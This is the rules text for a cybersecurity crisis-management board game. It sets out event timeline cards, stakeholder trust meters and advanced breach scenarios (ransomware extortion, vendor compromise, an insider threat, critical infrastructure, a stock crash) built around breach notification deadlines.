Event Cards represent external events that occur during the crisis—some predictable deadlines, some escalations triggered by the team's situation. Events create time pressure and complicate the response.
Money mapping: 1 Budget ≈ $50K. Dollar figures are narrative unless converted to Budget on the card.
The game lasts 8 turns. Each turn is one crisis phase of roughly 6-12 hours of narrative time:
| Turn | Narrative Time | Anchor |
|---|---|---|
| 1 | Detection +6h | Internal discovery |
| 2 | +12h | Legal/executive escalation complete |
| 3 | +18h | Board meets |
| 4 | +24h | Day 1 ends |
| 5 | +36h | Customer notification recommended deadline; default ransom deadline |
| 6 | +48h | Regulatory escalation begins |
| 7 | +60h | Legal/government pressure peaks |
| 8 | +72h | GDPR 72-hour regulatory notification deadline — game ends |
All deadlines in this module use this clock. There are no other timers.
At setup: 1. Place the 6 Scheduled events face-down on the timeline at their printed turns. 2. Place the 6 Triggered events face-up in a reference row where everyone can read their trigger conditions.
Each turn (start of turn): 1. Reveal and resolve any Scheduled event placed on this turn. 2. Check every un-fired Triggered event's condition; resolve any whose condition is now met. 3. Each event fires once per game.
Trust changes from events clamp to 0-100%. Budget changes clamp to a floor of 0.
Scheduled: Turn 2 Type: Discovery
Description: A news outlet publishes a story about the breach: - "Company Suffers Data Breach" headline - Unnamed source gives details - Story spreads on social media - Phone starts ringing with reporter calls
Resolution: - If ACTION-11 (Media Management) was completed before this turn: Media trust +5 (proactive framing works) - Otherwise: Media trust -10 (the story runs without your side)
Duration: Ongoing narrative (media coverage continues)
Scheduled: Turn 3 Type: Governance
Description: The board of directors holds an emergency meeting to review breach scope, investigation progress, remediation plan, budget, and executive performance.
Resolution: - If ACTION-12 (Board Communication) was completed before this turn: Board trust +10 (prepared briefing) - Otherwise: Board trust -20 (the board learns details from the news, not from you)
Team Preparation: - Should have forensics/investigation underway - Should have preliminary findings - Should have a communication plan - CEO should be briefed
Scheduled: Turn 5 Type: Deadline checkpoint
Description: Counsel confirms customer notification should not wait any longer. Real-world laws require notification "without unreasonable delay" — in this game, the recommended deadline is end of Turn 5.
Resolution: - If ACTION-09 (Customer Notification) is completed by end of Turn 5: no penalty. If it was framed transparently, +5 Reputation at final scoring. - If not: Customer trust -10 now and at the start of each later turn until ACTION-09 is completed. - Deferred consequence: if customers are never notified in-game, -15 Reputation at final scoring (the statutory notification window is missed after the game ends).
Scheduled: Turn 5 (public companies only — skip for private companies) Type: Governance
Description: Shareholder activists contact the board: demand explanations, threaten a proxy fight, and give interviews about leadership failure.
Resolution: - If ACTION-12 (Board Communication) has been completed: Board trust -5 (pressure is absorbed) - Otherwise: Board trust -15
Scheduled: Turn 6 (escalation begins; final deadline end of Turn 8) Type: Deadline
Description: The GDPR-style 72-hour clock is running out. Regulators expect notification of the breach (ACTION-10) before the clock expires at end of Turn 8.
Resolution: - If ACTION-10 (Regulatory Notification) is already completed: Regulator trust +5 (early, cooperative notification) - If not: Regulator trust -10 now and at the start of each later turn (Turns 6, 7, 8) until ACTION-10 is completed. - Deferred consequence: if regulators are never notified in-game, -20 Reputation at final scoring (deferred fine — GDPR fines run up to €20M or 4% of global turnover, whichever is HIGHER; narrative-only figure).
Scheduled: Turn 7 (medium/large breaches — skip for small-scope games) Type: Legal
Description: A subpoena arrives (FBI, state attorney general, or a congressional inquiry): turn over evidence, provide executive testimony, comply with the investigation.
Resolution: - Budget -5 (legal fees; floor 0) - Executive trust -10 (executives in the spotlight) - Investigation +5% (compelled evidence-sharing accelerates fact-finding)
Opportunity: an independent investigation can validate a good-faith response; law enforcement may help recover evidence.
Trigger: ACTION-09 not completed by end of Turn 5, OR Customer trust below 20% at the start of any turn. Type: Legal
Description: A law firm recruits customers and files a class action: "Jane Doe et al. vs. [Company Name]" — failure to protect data, failure to notify in a timely way, damages plus attorney fees.
Effects: - Customer trust -15 - Board trust -10 - -10 Reputation at final scoring
Team Response: Cannot be undone — only mitigated by rebuilding trust for the rest of the game.
Trigger: Regulator trust below 20% at the start of any turn. (If regulators are never notified in-game, the deferred -20 Reputation from EVENT-02 applies at scoring instead — do not double-apply.) Type: Regulatory
Description: A regulator announces a penalty for inadequate security and delayed cooperation.
Effects: - Budget -10 (≈ $500K; floor 0) - Board trust -10 - -10 Reputation at final scoring
Real-world scale (narrative-only): turnover-based regimes drive the largest penalties — GDPR fines can reach €20M or 4% of global turnover, whichever is HIGHER.
Trigger: Media trust below 20% at the start of any turn, OR no Communication-category action completed by end of Turn 3. Type: Communication
Description: Major outlets pick up the story: national coverage, "Massive Data Breach" headlines, social media amplification.
Effects: - Media trust -20 - Customer trust -15 - Board trust -10
Team Response: ACTION-11 (Media Management) plus visible, transparent leadership.
Trigger: At the start of Turn 6, Remediation is below 30% AND ACTION-07 (Rebuild) has not been completed. Type: Escalation — once per game
Description: While responding to the first breach, investigators discover another compromised data store — the attacker maintained hidden persistence.
Effects: - The game extends by +2 turns (once per game): play now runs to Turn 10. Scoring deadlines do NOT move — the regulatory deadline remains end of Turn 8. - Investigation -30% (new breach invalidates part of your picture) - Customer trust -20, Regulator trust -15, Media trust -10, Board trust -15 - Board releases +10 emergency Budget - -10 Reputation at final scoring
Prevention: ACTION-07 (Rebuild), ACTION-04 (Third-Party IR), or strong Remediation progress by Turn 6.
Trigger: Customer trust below 40% at the start of Turn 5 or any later turn. Type: Business
Description: A competitor launches a "Trust us with your data" campaign aimed at your customers.
Effects: - Customer trust -10 - Budget -5 (lost revenue; floor 0)
Team Response: Customer communication and visible security improvements; trust can rebuild over the remaining turns.
Trigger: Executive trust below 30% at the start of any turn. Type: Internal
Description: A key executive (CISO, CTO, General Counsel, or CFO) resigns mid-crisis, citing "personal reasons" — really: "I don't trust this response."
Effects: - Executive trust -10 - Board trust -10 - While Executive trust remains below 30%, the Justification bonus (optional +5% d20) is unavailable — leadership vacuum
Prevention: Regular internal communication, visible progress, board support.
| Event | Kind | Turn / Trigger | Core Effect |
|---|---|---|---|
| EVENT-01 First Media Coverage | Scheduled | Turn 2 | Media +5 if ACTION-11 done, else -10 |
| EVENT-04 Board Meeting | Scheduled | Turn 3 | Board +10 if ACTION-12 done, else -20 |
| EVENT-03 Customer Notification Window | Scheduled | Turn 5 | -10 Customer/turn if ACTION-09 late; never = -15 Rep |
| EVENT-09 Shareholder Pressure | Scheduled | Turn 5 (public co.) | Board -5 (prepared) or -15 |
| EVENT-02 Regulatory 72h Deadline | Scheduled | Turn 6 (deadline Turn 8) | -10 Regulator/turn while un-notified; never = -20 Rep |
| EVENT-12 Government Subpoena | Scheduled | Turn 7 (med/large) | Budget -5, Exec -10, Investigation +5% |
| EVENT-05 Class Action | Triggered | Customers un-notified after T5 or trust <20% | Cust -15, Board -10, -10 Rep |
| EVENT-06 Regulatory Fine | Triggered | Regulator trust <20% | Budget -10, Board -10, -10 Rep |
| EVENT-07 Media Frenzy | Triggered | Media <20% or silent through T3 | Media -20, Cust -15, Board -10 |
| EVENT-08 Second Breach | Triggered | T6: Remediation <30%, no rebuild | +2 turns (once), Inv -30%, trust hits, -10 Rep |
| EVENT-10 Competitor Advantage | Triggered | Customer trust <40% from T5 | Cust -10, Budget -5 |
| EVENT-11 Executive Resignation | Triggered | Executive trust <30% | Exec -10, Board -10, no Justification bonus |
| Deadline | Turn | If missed |
|---|---|---|
| Internal legal/executive escalation | End of Turn 2 | Narrative only (relabeled from the old "12-hour regulatory deadline" — the regulatory anchor is GDPR 72h) |
| Customer notification (ACTION-09) recommended | End of Turn 5 | Customer trust -10/turn; EVENT-05 may trigger; never notified = -15 Reputation at scoring |
| Ransom decision (ACTION-13) | Start of Turn 5 (default; +2 turns if NEGOTIATE) | Treated as REFUSE; data-publication event fires |
| Regulatory notification (ACTION-10) | End of Turn 8 (escalating from Turn 6) | Regulator trust -10/turn from Turn 6; never notified = -20 Reputation at scoring |
Former "30-day"/"60-day" deadlines from v2.1 are re-expressed as the deferred final-scoring consequences above — they no longer exist as separate timers.
Standard 8-Turn Disaster Recovery Game:
| Turn | Scheduled Event | Typical Focus |
|---|---|---|
| 1 | — | Investigate, contain |
| 2 | First Media Coverage | Investigation, media prep |
| 3 | Board Meeting | Board briefed, regulators notified early |
| 4 | — | Remediation |
| 5 | Customer Notification Window + Shareholder Pressure | Customer notification, ransom decision |
| 6 | Regulatory 72h Deadline (escalation begins) | Regulators notified (if not already), remediation |
| 7 | Government Subpoena | Final remediation, communication |
| 8 | — (game ends at +72h) | Wrap-up actions, final scoring |
Disaster Recovery Module: Event Timeline Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/disaster-recovery/core-deck/stakeholder-cards.md
Version: 2.2 - Playtest Edition Last Updated: October 2025
Stakeholder Cards represent the key groups affected by a data breach. Each stakeholder has a trust/satisfaction level (0-100%) that changes based on team actions. Stakeholders can escalate if not managed (triggering Events and budget costs).
All older thresholds ("<30% trust = loss", "keep above 30/40/50 to win") are removed in v2.2.
Stakeholder Type: External Primary Concern: Data privacy and service availability Trust Meter: Starts at 50% Decay (v2.2): From Turn 3 onward, if the team has completed no Communication-category action (the free Holding Statement counts), Customer trust -10 at the start of each turn. This does not stack with the Turn-5 notification penalty (EVENT-03) — apply one, not both, per turn. Below 20% = CRITICAL warning state (may trigger EVENT-05).
Description: The customers whose data was breached. They want to know: - What data was accessed - Whether it was encrypted - What they should do (change password, watch credit) - Whether the company is protecting them - Whether to switch providers
Behavior: - High Trust (70%+): Continue using service, minor PR impact - Medium Trust (40-70%): Some customer loss, but company is "handling it" - Low Trust (<40%): Customer exodus, lawsuits, regulatory investigation - Critical (<20%): Mass churn, bankruptcy risk, acquisition/collapse
What Affects Trust: - Increases Trust: - Customer Notification (ACTION-09): +15% - Public statement about patch/fix: +5% - Free credit monitoring offer: +10% - Quick response time: +5% per turn if investigating
Goal: - Ideally maintain above 50% for a positive outcome (trust feeds the final Reputation computation)
Loss (v2.2 single rule): - Customer trust at 0% = company collapses (immediate loss) - Narrative: mass churn, lawsuits, bankruptcy/acquisition
Crisis Actions That Help: - ACTION-09 (Customer Notification): +15% trust - ACTION-11 (Media Management): +10% trust - Any remediation action that shows progress: +2-5%
Special Events: - If trust drops too low, class action lawsuit filed (see Event Cards) - If trust stays high, customer retention and recovery possible - Media coverage affects customer trust (see Stakeholder: Media)
Stakeholder Type: Government/Legal Primary Concern: Compliance with breach notification laws Trust Meter: Starts at 60% Escalation (v2.2): If ACTION-10 is not completed, Regulator trust -10 at the start of each turn from Turn 6 (see EVENT-02). Below 20% = CRITICAL warning state (triggers EVENT-06 Regulatory Fine).
Description: Government agencies that regulate data privacy: - State attorneys general (breach notification laws) - Federal regulators (healthcare, financial, etc.) - International regulators (GDPR if any EU customers) - Law enforcement (FBI, Secret Service)
Behavior: - High Confidence (70%+): Voluntary cooperation, no penalties - Medium Confidence (40-70%): Investigation, possible fines - Low Confidence (<40%): Aggressive investigation, significant fines - Critical (<20%): Criminal prosecution, company shut down
What Affects Regulatory Confidence: - Increases Confidence: - Regulatory Notification (ACTION-10): +20% - Prompt customer notification: +10% - Third-party incident response (ACTION-04): +15% - Forensics evidence: +10% - Proactive remediation: +5%
Regulatory Requirements Vary (real-world flavor; the in-game clock is GDPR 72h = end of Turn 8): - GDPR (EU): Notify supervisory authority within 72 hours; fines up to €20M or 4% of global turnover, whichever is HIGHER - California: Notify without unreasonable delay; CCPA statutory damages fuel class actions - HIPAA: Notification within 60 days (healthcare) - Sector-Specific: Finance, healthcare have stricter rules
Goal: - Maintain regulatory confidence above 50% - Comply with the Turn-8 notification requirement
Loss (v2.2 single rule): - Regulator trust at 0% = company collapses (immediate loss) - Narrative: crippling fines, criminal prosecution, license revoked
Crisis Actions That Help: - ACTION-10 (Regulatory Notification): +20% confidence - ACTION-04 (Third-party IR): +15% confidence - ACTION-05, ACTION-07 (Remediation): +5-10%
Special Events: - If notification deadline missed: Regulatory Penalty Event - If confidence drops too low: Fine Assessment Event - If properly handled: Regulatory Cooperation Event (reduced penalties)
Stakeholder Type: External / Communication Primary Concern: Newsworthy story (bigger = bigger problem) Trust Meter: Starts at 40% (media is naturally skeptical) Escalation: Escalates based on company response quality
Description: Media outlets, journalists, bloggers, social media. Media decides whether breach is: - Small tech story (1 article) - Major business news (multiple outlets, days) - National news (major outlets, weeks) - International scandal (global coverage)
Behavior: - Positive Coverage (70%+): "Company handled breach well", trust maintained - Neutral Coverage (40-70%): Matter-of-fact reporting, some concern - Negative Coverage (<40%): "Company slow to respond", "Cover-up suspected" - Scandal (<20%): Major negative coverage, "Company failed customers"
What Affects Media Coverage: - Positive Factors: - Proactive media statement (ACTION-11): +20% - Quick notification (customers notified by end of Turn 5): +15% - CEO takes responsibility: +10% - Transparent communication: +10% - Third-party validation: +5%
Media Impact on Business: - Positive media → customers stay, suppliers trust company - Negative media → customers leave, stock price drops, suppliers question - Scandal media → business collapse possible, bankruptcy risk
Goal: - Maintain media trust above 40% - Frame narrative as "company handled responsibly" - Minimize negative coverage (below 20% = CRITICAL warning; triggers EVENT-07)
Loss (v2.2 single rule): - Media trust at 0% = company collapses (immediate loss) - Narrative: negligence narrative sticks, stock crash, consumer boycott
Crisis Actions That Help: - ACTION-11 (Media Management): +20% coverage - ACTION-09 (Customer Notification): +5% (transparency) - ACTION-12 (Board Communication): +5% (if credible)
Special Events: - If company is silent: "Media Frenzy" Event (increased coverage) - If company responds well: "Positive Coverage" Event (mitigates damage) - If executives hide: "Cover-up Narrative" Event (major damage)
Stakeholder Type: Internal / Governance Primary Concern: Company liability and fiduciary duty Trust Meter: Starts at 70% (board is inherently supportive initially) Escalation: Drops if response is inadequate; may fire CEO
Description: Board of directors (and C-level executives if private company). Board must: - Fulfill fiduciary duty to shareholders - Authorize major spending (crisis response can be very expensive) - Decide on disclosure (SEC rules if public) - Decide on executives' future (fire/retain CEO) - Manage shareholder relationships
Behavior: - High Confidence (70%+): Board is supportive, authorizes spending, defends executives - Medium Confidence (40-70%): Board is questioning, scrutinizes spending, considers changes - Low Confidence (<40%): Board is critical, may fire CEO, considers restructuring - Critical (<20%): Board votes to remove management, sell company, or file bankruptcy
What Affects Board Confidence: - Increases Confidence: - Board Notification (ACTION-12): +20% - Professional incident response: +15% - Quick containment: +10% - Good regulatory relationship: +10% - Transparent communication: +5%
Board Decision Points (v2.2 clock): - Turn 3: Board Meeting (EVENT-04; ACTION-12 should be done before it) - Board decides if CEO retains confidence - Major spending approvals (forensics, lawyers, PR) - Disclosure decisions
Restructuring discussions
Turn 8: End-game assessment
Goal: - Maintain board confidence above 50% - Board authorizes necessary spending - Executives retain their positions (below 20% = CRITICAL warning state)
Loss (v2.2 single rule): - Board trust at 0% = company collapses (immediate loss) - Narrative: CEO fired, forced sale, bankruptcy filing
Crisis Actions That Help: - ACTION-12 (Board Notification): +20% confidence - ACTION-04 (Third-party IR): +15% (shows professional response) - ACTION-01, ACTION-07 (Forensics/Rebuild): +5-10%
Special Events: - Turn 3: Board Meeting Event (first assessment) - If confidence drops low: "CEO Removed" Event (new CEO, game becomes harder) - If well-managed: "Board Confidence Maintained" Event (positive modifier)
Stakeholder Type: Internal / Management Primary Concern: Job security and company survival Trust Meter: Starts at 80% (executives are naturally supportive initially) Escalation: Drops if response is chaotic; may resign or sabotage
Description: C-level executives (CEO, CTO, CFO, CISO, General Counsel) who must: - Make critical decisions under pressure - Coordinate crisis response - Handle media inquiries - Present to board - Ensure company continues operating - Manage their own careers/reputations
Behavior: - High Morale (70%+): Executives are focused, coordinated, decisive - Medium Morale (40-70%): Executives are stressed, some disagreements, slower decisions - Low Morale (<40%): Executives may resign, infighting, poor decisions - Critical (<20%): Executive exodus, chaos, no leadership
What Affects Executive Morale: - Increases Morale: - Clear incident response plan: +15% - Professional guidance (consultants): +10% - Regular communication/updates: +5% per turn - Board support: +10% - Progress on containment: +5%
Executive Departures Risk: - If morale drops too low, key executives resign - Each resignation removes their expertise from future decisions - Replacement executives are less effective initially - Crisis becomes harder to manage
Goal: - Maintain executive morale above 50% - Prevent key executive resignations (below 30% triggers EVENT-11; below 20% = CRITICAL warning state) - While Executive trust is below 30%, the Justification bonus is unavailable (see EVENT-11)
Loss (v2.2 single rule): - Executive trust at 0% = company collapses (immediate loss) - Narrative: executive exodus, leadership vacuum, chaos
Crisis Actions That Help: - Regular communication: +5% per turn - Professional response team: +10% - Regulatory/customer progress: +5% - Board confidence: +10%
Special Events: - If morale drops low: "Executive Resignation" Event (key person leaves) - If morale stays high: "Leadership United" Event (positive coordination bonus) - Media attacks on executives: Morale drop (-10%)
| Stakeholder | Type | Start Trust | Critical Warning | Primary Actions |
|---|---|---|---|---|
| Customers | External | 50% | <20% | ACTION-09 (notify), ACTION-11 (PR) |
| Regulators | Government | 60% | <20% | ACTION-10 (notify), ACTION-01/04 (forensics) |
| Media | External | 40% | <20% | ACTION-11 (PR), ACTION-09 (transparency) |
| Board | Internal | 70% | <20% | ACTION-12 (notify), ACTION-04 (guidance) |
| Executives | Internal | 80% | <20% (resignations from <30%) | Regular communication, success indicators |
Reminder (v2.2): critical is a warning state only. The single loss condition is any trust meter at 0%. Meters clamp to 0-100%.
Teams must balance managing five competing stakeholder groups:
Prioritization Strategy 1: External First - Focus on Customers and Media - Maintain public trust - Regulators will follow - Risk: Internal management gets neglected
Prioritization Strategy 2: Internal First - Focus on Board and Executives - Maintain leadership confidence - Internal team makes better decisions - Risk: External stakeholders (customers, media) get neglected
Prioritization Strategy 3: Balanced - Do some actions for each stakeholder group - Distribute budget across all notifications - More complex but sustainable - Risk: Medium progress on all, complete on none
Prioritization Strategy 4: Targeted - Identify critical stakeholder (maybe regulators) - Focus budget there - Neglect others - Risk: Single stakeholder collapse
Stakeholders influence each other: - Media → Customers: If media says "company hid breach", customers distrust (stack penalties) - Regulators → Customers: If regulator fines company, customers see company as unsafe - Board → Executives: If board removes CEO, executives lose confidence - Executives → Board: If executives resign, board loses confidence in response - Customers → Stock Price: If customer trust drops, stock price drops (affects Board decisions)
Each stakeholder's escalation matches a Triggered Event (see Event Cards — those are the authoritative conditions):
Disaster Recovery Module: Stakeholder Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/disaster-recovery/expansion-deck/advanced-scenarios.md
Version: 2.2 - Playtest Edition Last Updated: October 2025
Advanced Scenario Cards extend the Disaster Recovery module with sophisticated, multi-faceted crisis situations that challenge experienced crisis management teams.
How scenarios work (v2.2): each scenario is played with the standard core rules — same 8-turn clock, same Action/Event/Stakeholder cards, same scoring. A scenario adds its "Special Events" as extra Scheduled events on the timeline at setup, and applies its concrete Difficulty (v2.2) effects (listed per scenario, replacing the old percentage "difficulty multipliers"). The only mechanical layers are the Special Events and the Difficulty block; "Cost Implications" sections are narrative color for the debrief. Dollar figures are narrative-only unless converted at 1 Budget ≈ $50K.
Complexity: ADVANCED Affected Regions: US + EU + Asia Primary Challenge: Different legal requirements for different regions
Description: Breach affects customer data in multiple countries with different privacy laws: - US (California): notify without unreasonable delay; CCPA statutory damages fuel class actions - EU (GDPR): 72-hour notification deadline; fines up to €20M or 4% of global turnover, whichever is HIGHER - Asia (varies): Different deadlines and requirements in each country
Data residency requirements mean: - EU customer data cannot be transferred to US servers - Forensics must happen in country where data is stored - Different regulators in each country demand investigation - Different notification laws require different messages
Key Complications: - Timeline Conflict: EU regulators demand notification faster than the domestic clock; US requires notification without unreasonable delay; Asia varies - Legal Conflict: EU GDPR vs. US lawful intercept (conflicting requirements) - Investigation: Must conduct forensics in multiple jurisdictions simultaneously - Costs: Multi-region response = much higher costs
Team Decision Points: 1. Which region to prioritize (cannot satisfy all simultaneously) 2. How to conduct forensics across jurisdictions 3. How to notify customers differently per region 4. How to handle conflicting regulatory requirements
Special Events (added to the timeline at setup): - Turn 2: EU regulators demand notification — a second ACTION-10 play (EU filing) is due by end of Turn 4 - Turn 5: International regulators demand investigation coordination (Regulator trust -5 if Investigation is below 25%) - Turn 6: Data residency complication — if the EU filing was missed, Regulator trust -10 per turn (in place of, not stacked with, the core EVENT-02 escalation)
Cost Implications: - Multi-region legal and forensics overhead: see Difficulty below - Regulatory fines can stack across jurisdictions (narrative-only) - Notification costs: translations, different templates, regulatory filings
Team Response: - Must prioritize regions (satisfy EU first due to timeline) - Must engage local lawyers in each jurisdiction - Must conduct compliant investigation (following local laws) - Communication % must advance faster than usual
Difficulty (v2.2): - All Communication advances -5% (multi-jurisdiction overhead; minimum +5%) - A second regulator notification (EU) is required by end of Turn 4 (ACTION-10 played twice this game) - Set aside 5 Budget at setup as a translation/filing reserve (unavailable for actions)
Complexity: ADVANCED Attacker Demand: $10M ransom or threaten to sell/publish data Primary Challenge: Responding to extortion threats
Description: Attacker not only encrypted data but also stole data and threatens public disclosure: - "Pay up or we publish 50GB of customer PII on dark web" (demand ≈ 20 Budget; narrative "$10M" for a large enterprise) - Attacker provides proof of data access (sample files) - Extortion email sent to CEO and board - Attacker sets the deadline at the start of Turn 5 (the core ACTION-13 ransom deadline)
Key Complications: - Payment Question: Pay ransom or not? - Paying: Funding criminal enterprise, no guarantee of data deletion - Not paying: Risk of data publication (massive PR disaster) - Disclosure Dilemma: Tell customers about extortion threat? - Yes: Customers fear data will be published - No: If data is published, looks like cover-up - Law Enforcement: FBI recommends not paying (incentivizes more attacks) - Backup Reliance: Can you recover without paying?
Timeline Pressure (Special Events added at setup): - Turn 1: Extortion email; ransom deadline set at start of Turn 5 - Turn 2: First partial data publication (attacker shows they have data): Media trust -5 - Turn 3: Attacker lowers price (negotiation attempt; pure roleplay — ACTION-13 costs are unchanged) - Turn 5: Deadline reached — resolve ACTION-13 as printed (publish if unpaid; +2 turns if NEGOTIATE)
Financial Dilemma: - Ransom: payment may violate OFAC sanctions if the actor is sanctioned; many insurers restrict or exclude ransom coverage - Recovery from backup: Slow (if backups exist) - Data publication: Regulatory fines + lawsuits (potentially $50M+ liability; narrative-only) - Public disclosure: Stock price crash, customer loss
Team Decisions: 1. Pay ransom? (Risk: Encourages future attacks, no guarantee) 2. Attempt to recover from backup? (Risk: Slow recovery, data loss) 3. Notify customers before/after data publication? (Risk: Either way is bad) 4. Notify regulators? (Required, but shows full extent of damage)
Law Enforcement Engagement: - FBI may take over investigation (federal crime) - Reduces team's control of situation - May recommend decoy ransom negotiation (catch attacker) - Investigation may take weeks (slow response)
Special Events (added to the timeline at setup): - Turn 3: Media discovers extortion threat ("CEO held for ransom"): Media trust -10 - Turn 4: Attacker releases more sample data: Customer trust -5
Cost Implications: - Ransom: 20 Budget if paid (ACTION-13 PAY, as printed) - FBI coordination and extortion-specific notification overhead: see Difficulty below - Regulatory fines if data published: narrative-only (GDPR-scale)
Difficulty (v2.2): - Remediation advances are halved until ACTION-13 is declared (operational paralysis while the decision hangs) - Use ACTION-13 exactly as printed; the ransom deadline is start of Turn 5
Complexity: ADVANCED Vector: Breach compromises customers' data at YOUR company's data store Primary Challenge: Managing responsibility for vendor compromise
Description: Investigation reveals attacker didn't target your company directly—they compromised a vendor you use: - Your company uses cloud storage vendor (e.g., competitor to AWS) - That vendor was breached - Attacker gained access to YOUR customer data stored at vendor - Question: Who is responsible? You? Vendor? Both?
Key Complications: - Liability Question: - You're liable to customers (you selected vendor) - Vendor is liable (their security failure) - Customers might sue both - Vendor Response: - Vendor may be uncooperative (deny liability) - Vendor may be bankrupt (vendor company collapse during breach) - Vendor may not investigate properly - Notification Question: - Tell customers you chose bad vendor? - Or just notify about data breach without explaining vendor? - Either way looks bad - Investigation: - Must investigate vendor (not your own systems) - Vendor may not cooperate - Limited forensic access (you don't control vendor systems) - Regulatory agencies may blame you anyway
Responsibility & Liability: - Customer lawsuits: "You failed to vet vendor properly" - Regulatory fines: "You failed to oversee third-party risk" - Vendor lawsuits: "Vendor refuses to pay damages" - Vendor bankruptcy: "Vendor can't pay, customers turn to you"
Team Decisions: 1. Blame vendor (legally risky, looks bad) 2. Share responsibility (legally safer, but costs more) 3. Quickly terminate vendor relationship (looks reactive) 4. Demand vendor pay for notification/remediation (vendor may refuse)
Special Events: - Turn 1: Discovery that vendor was breached - Turn 2: Vendor denies liability / claims it's your responsibility - Turn 3: Regulatory agency demands to know vendor details - Turn 4: First customer lawsuit against both you AND vendor - Turn 5: Vendor declares bankruptcy (can't pay damages)
Cost Implications: - Investigation into vendor: +8 Budget (forensics at vendor site) - Legal: +20 Budget (defending against liability claims) - Regulatory fines: Potentially full amount (you're still liable) - Customer lawsuits: Likely regardless of vendor's role - Vendor transition: +15 Budget (switch to new vendor, migrate data)
Communication Challenge: - Customers angry at you (you chose bad vendor) - Media: "Company failed to vet third-party security" - Regulatory: "Poor third-party risk management" - Board: "Why did we use this vendor?"
Difficulty (v2.2): - Investigation advances -5% (no direct access to vendor systems; minimum +5%) - Set aside 10 Budget at setup as a legal reserve (unavailable for actions) - Turn-5 Special Event: vendor declares bankruptcy — Board trust -10
Complexity: ADVANCED Attacker: Current employee, not external hacker Primary Challenge: Organizational trauma and trust collapse
Description: During investigation of external breach, forensic team discovers: - The "external breach" had help from insider - Employee provided attacker with access/credentials - Employee may have also exfiltrated data - Employee is still working at company (not yet caught)
Key Complications: - Who is involved? - Single rogue employee? - Conspiracy (multiple employees)? - Which departments are involved? - Motive: - Disgruntled employee selling data - Corporate espionage (hired by competitor) - Theft for personal gain - Political/ideological motivation - Scope: - What other systems did insider compromise? - What data did they access/steal? - How long were they active? - Are there other insiders? - HR/Legal: - Fire the employee immediately (risks legal action) - Continue employment while investigating (ethics question) - Involve law enforcement (police investigation) - Civil litigation from employee (wrongful termination claims)
Organizational Impact: - Trust in employees collapses - Morale plummets (people suspect each other) - Staff paranoia increases - Executive distraction (investigating insider)
Special Events: - Turn 2: Forensics discovers insider involvement - Turn 3: HR/Legal team must decide: fire or investigate? - Turn 4: If fired, wrongful termination lawsuit likely - Turn 4: If not fired, employee may destroy more evidence - Turn 5: Law enforcement investigation (if reported to police)
Team Decisions: 1. Immediately fire employee (legal risk but stops damage) 2. Continue employment while investigating (ethical but risky) 3. Involve law enforcement (criminal investigation, slow) 4. Settle potential lawsuits preemptively (expensive)
Investigation Complexity: - Cannot trust employee's explanations - Must verify what employee had access to - Must recover deleted data/logs - Must interview other employees - Investigation takes much longer (suspicious of everyone)
Cost Implications: - Extended forensics: +15 Budget (investigating employee) - Legal: +25 Budget (employment law, potential settlements) - HR investigation: +8 Budget (interview staff, background checks) - Remediation: +20 Budget (credential reset, system rebuild) - Potential lawsuit: Millions if significant
Communication Challenge: - Cannot publicly disclose insider involvement (defamation risk) - Regulators and customers demand explanation - Media: "Company had insider threat" - Board: "Why was security so bad?"
Difficulty (v2.2): - Investigation advances are halved until Investigation reaches 50% (internal accounts cannot be trusted) - Executive trust starts at 60% (instead of 80%) - ACTION-08 (Credential Reset) is effectively mandatory — if not completed by end of Turn 6, EVENT-08 (Second Breach) fires automatically
Complexity: ADVANCED+ Sector: Utilities, Healthcare, Transportation, Manufacturing Primary Challenge: Physical safety takes priority over cybersecurity response
Description: Breach affects critical infrastructure where compromise could cause physical harm: - Healthcare: Hospital network compromise during surgery (patient safety risk) - Utilities: Power grid compromise during storm (people without power/heat) - Transportation: Traffic system compromise (accidents possible) - Manufacturing: Production system compromise (equipment failure)
Key Complication: Safety > Security - Cannot shut down system for forensics if people are harmed - Cannot remediate if it requires system downtime - Incident response must preserve operational safety - Balances security investigation with operational continuity
Regulatory Escalation: - CISA (Cybersecurity Infrastructure Security Agency) involved immediately - National Incident Command System (NICS) may take over - Government mandates response (not optional) - Military/intelligence agencies may be involved - Cannot investigate without government approval
Special Considerations: - Lives are at stake (not just data) - Response priorities are: Safety → Containment → Investigation - Traditional forensics may be impossible (system must stay operational) - Attacker knows system is critical (leverage for negotiation)
Special Events: - Turn 1: CISA declaration of critical infrastructure incident - Turn 2: Government takes partial control of response (may override company decisions) - Turn 3-4: Attacker threatens system shutdown (extortion using safety risk) - Turn 5: Coordinated media/government briefings (national security implications)
Team Decisions: 1. Continue operations (risk of safety incident) or shut down (risk to people without service)? 2. Engage with government agencies (lose control of response) 3. Negotiate with attacker (payment may violate OFAC sanctions if the actor is sanctioned; government will weigh in) 4. Accept potential service interruption (for safety)
Cost Implications: - Immediate government response: +50 Budget (federal agencies) - Operational impact: Unknown (depends on what breaks) - Remediation: Cannot shut down system (very limited options) - Investigation: Deferred (safety is priority) - National security classification: Investigation may be classified (cannot discuss publicly)
Communication Challenge: - Cannot disclose security details (national security) - Cannot disclose full scope (might encourage copycat attacks) - Public panic risk (if people know infrastructure is vulnerable) - Media cannot report full details (government requests)
Difficulty (v2.2): - Remediation advances are halved (systems must stay operational — no downtime allowed) - Communication advances -5% (national security disclosure restrictions; minimum +5%) - ACTION-13 PAY is unavailable (government prohibits payment) - Turn-1 Special Event: CISA declaration — Regulator trust starts at 50% but ACTION-10 gives +25 instead of +20 (cooperation is rewarded)
Complexity: ADVANCED Trigger: Negative media coverage + analyst downgrades Primary Challenge: Managing financial crisis alongside security crisis
Description: Public company stock price crashes following breach announcement: - News of breach announced - Stock drops 10-20% in first day - Short-sellers amplify negative sentiment - Analysts downgrade stock rating - Institutional investors sell (panic selling) - Stock drops 30-50% or more
Key Complications: - Financial Crisis: - Company loses market value ($1B+ in some cases) - Credit rating downgrade possible - Difficulty accessing credit markets - Acquisition at depressed price possible - Board/Shareholder Panic: - Shareholders demand CEO removal - Board may fire executives immediately - Board may accept lowball acquisition offer - Media coverage of internal turmoil - Business Disruption: - Employee morale crashes (stock is part of compensation) - Key employees leave (seeking more stable companies) - Customer confidence drops - Supplier payment delays (credit rating issue) - Business slows due to loss of employee focus
Investor Psychology: - Fear-driven selling (stock is "falling knife") - Rumors spread (company is bankruptcy risk) - Technical traders amplify selling (algorithmic trading) - Recovery takes months/years even if breach is minor
